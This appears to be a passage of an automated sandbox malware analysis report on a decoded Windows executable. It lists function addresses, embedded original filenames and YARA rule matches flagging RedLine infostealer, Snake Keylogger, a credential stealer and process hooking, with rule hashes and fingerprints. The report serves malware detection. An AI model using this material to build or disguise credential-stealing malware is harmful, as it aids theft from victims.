                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064618200_2_06461820
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646AA280_2_0646AA28
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646DC280_2_0646DC28
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064618300_2_06461830
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064694380_2_06469438
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646A0C80_2_0646A0C8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646D2C80_2_0646D2C8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064658D00_2_064658D0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646BCE80_2_0646BCE8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646EEE80_2_0646EEE8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06461CE90_2_06461CE9
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064604F80_2_064604F8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06461CF80_2_06461CF8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06463CF90_2_06463CF9
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06460E880_2_06460E88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646CC880_2_0646CC88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06469A880_2_06469A88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06460E980_2_06460E98
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646B6A80_2_0646B6A8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646E8A80_2_0646E8A8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646DF480_2_0646DF48
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646AD480_2_0646AD48
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064613590_2_06461359
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646C9680_2_0646C968
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064697680_2_06469768
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064613680_2_06461368
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646FB700_2_0646FB70
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646D9080_2_0646D908
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064605080_2_06460508
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646A7080_2_0646A708
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646C3280_2_0646C328
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064691280_2_06469128
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646F5280_2_0646F528
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646DF380_2_0646DF38
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064621C00_2_064621C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064609C00_2_064609C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646B9C80_2_0646B9C8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646EBC80_2_0646EBC8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064609D00_2_064609D0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646A3E80_2_0646A3E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646D5E80_2_0646D5E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646F1F80_2_0646F1F8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06463F800_2_06463F80
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646E5880_2_0646E588
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646B3880_2_0646B388
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646CFA10_2_0646CFA1
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0646CFA80_2_0646CFA8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06469DA80_2_06469DA8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064621B10_2_064621B1
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A22700_2_064A2270
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A0DC00_2_064A0DC0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A48000_2_064A4800
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A29580_2_064A2958
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A37280_2_064A3728
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A14A80_2_064A14A8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A30400_2_064A3040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A1B880_2_064A1B88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A225F0_2_064A225F
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A00400_2_064A0040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A0DB20_2_064A0DB2
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A29470_2_064A2947
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A37170_2_064A3717
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A149A0_2_064A149A
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A302F0_2_064A302F
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064A1B780_2_064A1B78
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F834F40_2_06F834F4
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F8B6090_2_06F8B609
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F84AB00_2_06F84AB0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F868B10_2_06F868B1
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F831D80_2_06F831D8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: String function: 0040E1D8 appears 43 times
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1648880969.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649139203.0000000000749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649027596.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4103874825.0000000000197000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4103950895.0000000000435000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeBinary or memory string: OriginalFilenameAubriella.exe4 vs 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.0.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
